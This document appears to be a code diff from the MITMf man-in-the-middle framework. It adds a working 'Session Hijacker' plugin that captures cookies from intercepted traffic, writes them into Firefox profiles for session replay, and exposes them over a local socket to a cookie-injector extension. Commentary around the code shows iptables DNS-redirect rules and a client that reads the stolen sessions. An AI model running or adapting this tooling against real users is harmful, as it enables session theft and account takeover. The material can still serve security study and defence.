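The IpTables helper itself is not part of this diff; presumably IpTables.getInstance().DNS() installs a NAT redirect so that clients' DNS queries land on MITMf's DNSChef port, and Flush() removes it again. A sketch of that assumption (the rule layout and helper names below are illustrative, not the project's code):

import subprocess

def redirect_dns_to_local(dns_port):
    """Approximation of what the IpTables DNS helper likely sets up:
    send intercepted UDP/53 traffic to the local DNSChef port.
    Assumption: the real helper may add different or additional rules."""
    rule = ["iptables", "-t", "nat", "-A", "PREROUTING",
            "-p", "udp", "--dport", "53",
            "-j", "REDIRECT", "--to-port", str(dns_port)]
    subprocess.check_call(rule)

def flush_nat():
    """Counterpart of the Flush() call, limited to the NAT table (assumption)."""
    subprocess.check_call(["iptables", "-t", "nat", "-F"])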
plugins/SessionHijacker.py (new file, 187 lines)
@@ -0,0 +1,187 @@
#!/usr/bin/env python2.7

# Copyright (c) 2014-2016 Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#

#Almost all of the Firefox related code was stolen from Firelamb https://github.com/sensepost/mana/tree/master/firelamb

import threading
import os
import sys
import time
import logging
import sqlite3
import json
import socket

from plugins.plugin import Plugin
from core.publicsuffix.publicsuffix import PublicSuffixList
from urlparse import urlparse

mitmf_logger = logging.getLogger("mitmf")

class SessionHijacker(Plugin):
    name       = "Session Hijacker"
    optname    = "hijack"
    desc       = "Performs session hijacking attacks against clients"
    implements = ["cleanHeaders"] #["handleHeader"]
    version    = "0.1"
    has_opts   = True

    def initialize(self, options):
        '''Called if plugin is enabled, passed the options namespace'''
        self.options  = options
        self.psl      = PublicSuffixList()
        self.firefox  = options.firefox
        self.mallory  = options.mallory
        self.save_dir = "./logs"
        self.seen_hosts = {}
        self.sql_conns  = {}
        self.sessions   = []
        self.html_header = "<h2>Cookies sniffed for the following domains\n<hr>\n<br>"

        #Recent versions of Firefox use "PRAGMA journal_mode=WAL" which requires
        #SQLite version 3.7.0 or later. You won't be able to read the database files
        #with SQLite version 3.6.23.1 or earlier. You'll get the "file is encrypted
        #or is not a database" message.

        sqlv = sqlite3.sqlite_version.split('.')
        if (int(sqlv[0]) < 3) or (int(sqlv[0]) == 3 and int(sqlv[1]) < 7):
            sys.exit("[-] sqlite3 version 3.7 or greater required")

        if not os.path.exists("./logs"):
            os.makedirs("./logs")

        if self.mallory:
            t = threading.Thread(name='mallory_server', target=self.mallory_server, args=())
            t.setDaemon(True)
            t.start()

    def cleanHeaders(self, request):  # Client => Server
        headers = request.getAllHeaders().copy()
        client_ip = request.getClientIP()

        if 'cookie' in headers:

            if self.firefox:
                url = "http://" + headers['host'] + request.getPathFromUri()
                for cookie in headers['cookie'].split(';'):
                    eq = cookie.find("=")
                    cname = str(cookie)[0:eq].strip()
                    cvalue = str(cookie)[eq+1:].strip()
                    self.firefoxdb(headers['host'], cname, cvalue, url, client_ip)

                mitmf_logger.info("%s << Inserted cookie into firefox db" % client_ip)

            if self.mallory:
                if len(self.sessions) > 0:
                    temp = []
                    for session in self.sessions:
                        temp.append(session[0])
                    if headers['host'] not in temp:
                        self.sessions.append((headers['host'], headers['cookie']))
                        mitmf_logger.info("%s Got client cookie: [%s] %s" % (client_ip, headers['host'], headers['cookie']))
                        mitmf_logger.info("%s Sent cookie to browser extension" % client_ip)
                else:
                    self.sessions.append((headers['host'], headers['cookie']))
                    mitmf_logger.info("%s Got client cookie: [%s] %s" % (client_ip, headers['host'], headers['cookie']))
                    mitmf_logger.info("%s Sent cookie to browser extension" % client_ip)

    #def handleHeader(self, request, key, value):  # Server => Client
    #    if 'set-cookie' in request.client.headers:
    #        cookie = request.client.headers['set-cookie']
    #        #host = request.client.headers['host'] #wtf????
    #        message = "%s Got server cookie: %s" % (request.client.getClientIP(), cookie)
    #        if self.urlMonitor.isClientLogging() is True:
    #            self.urlMonitor.writeClientLog(request.client, request.client.headers, message)
    #        else:
    #            mitmf_logger.info(message)

    def mallory_server(self):
        host = ''
        port = 20666
        server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        server.bind((host, port))
        server.listen(1)
        while True:
            client, addr = server.accept()
            if addr[0] != "127.0.0.1":
                client.send("Hacked By China!")
                client.close()
                continue
            request = client.recv(8192)
            request = request.split('\n')
            path = request[0].split()[1]
            client.send("HTTP/1.0 200 OK\r\n")
            client.send("Content-Type: text/html\r\n\r\n")
            if path == "/":
                client.send(json.dumps(self.sessions))
            client.close()

    def firefoxdb(self, host, cookie_name, cookie_value, url, ip):

        session_dir = self.save_dir + "/" + ip
        cookie_file = session_dir + '/cookies.sqlite'
        cookie_file_exists = os.path.exists(cookie_file)

        if (ip not in (self.sql_conns and os.listdir("./logs"))):

            try:
                if not os.path.exists(session_dir):
                    os.makedirs(session_dir)

                db = sqlite3.connect(cookie_file, isolation_level=None)
                self.sql_conns[ip] = db.cursor()

                if not cookie_file_exists:
                    self.sql_conns[ip].execute("CREATE TABLE moz_cookies (id INTEGER PRIMARY KEY, baseDomain TEXT, name TEXT, value TEXT, host TEXT, path TEXT, expiry INTEGER, lastAccessed INTEGER, creationTime INTEGER, isSecure INTEGER, isHttpOnly INTEGER, CONSTRAINT moz_uniqueid UNIQUE (name, host, path))")
                    self.sql_conns[ip].execute("CREATE INDEX moz_basedomain ON moz_cookies (baseDomain)")
            except Exception, e:
                print str(e)

        scheme = urlparse(url).scheme
        basedomain = self.psl.get_public_suffix(host)
        address = urlparse(url).hostname
        short_url = scheme + "://" + address

        log = open(session_dir + '/visited.html', 'a')
        if (ip not in self.seen_hosts):
            self.seen_hosts[ip] = {}
            log.write(self.html_header)

        if (address not in self.seen_hosts[ip]):
            self.seen_hosts[ip][address] = 1
            log.write("\n<br>\n<a href='%s'>%s</a>" % (short_url, address))

        log.close()

        if address == basedomain:
            address = "." + address

        expire_date = 2000000000  #year 2033
        now = int(time.time()) - 600
        self.sql_conns[ip].execute('INSERT OR IGNORE INTO moz_cookies (baseDomain, name, value, host, path, expiry, lastAccessed, creationTime, isSecure, isHttpOnly) VALUES (?,?,?,?,?,?,?,?,?,?)', (basedomain, cookie_name, cookie_value, address, '/', expire_date, now, now, 0, 0))

    def add_options(self, options):
        options.add_argument('--firefox', dest='firefox', action='store_true', default=False, help='Create a firefox profile with captured cookies')
        options.add_argument('--mallory', dest='mallory', action='store_true', default=False, help='Send cookies to the Mallory cookie injector browser extension')

    def finish(self):
        if self.firefox:
            print "\n[*] To load a session run: 'firefox -profile <client-ip> logs/<client-ip>/visited.html'"
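The --mallory option exposes the captured (host, cookie) pairs over a bare HTTP listener on 127.0.0.1:20666, which the browser extension is expected to poll. Anything running on the loopback interface can read the same JSON; a quick manual check (illustrative client, not part of the plugin):

import json
import socket

# Fetch the captured sessions from the plugin's mallory_server (loopback only).
s = socket.create_connection(("127.0.0.1", 20666))
s.sendall("GET / HTTP/1.0\r\n\r\n")
raw = ""
while True:
    chunk = s.recv(4096)
    if not chunk:
        break
    raw += chunk
s.close()

body = raw.split("\r\n\r\n", 1)[1]      # strip the minimal HTTP headers the server sends
for host, cookie in json.loads(body):   # list of (host, cookie) pairs
    print("%s -> %s" % (host, cookie))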
@@ -18,8 +18,6 @@
 # USA
 #

-import logging
-
 from sys import exit
 from core.utils import SystemConfig, IpTables
 from core.protocols.arp.ARPpoisoner import ARPpoisoner
@@ -23,6 +23,8 @@ from cStringIO import StringIO
 from plugins.plugin import Plugin
 from PIL import Image

+mitmf_logger = logging.getLogger("mitmf")
+
 class Upsidedownternet(Plugin):
     name = "Upsidedownternet"
     optname = "upsidedownternet"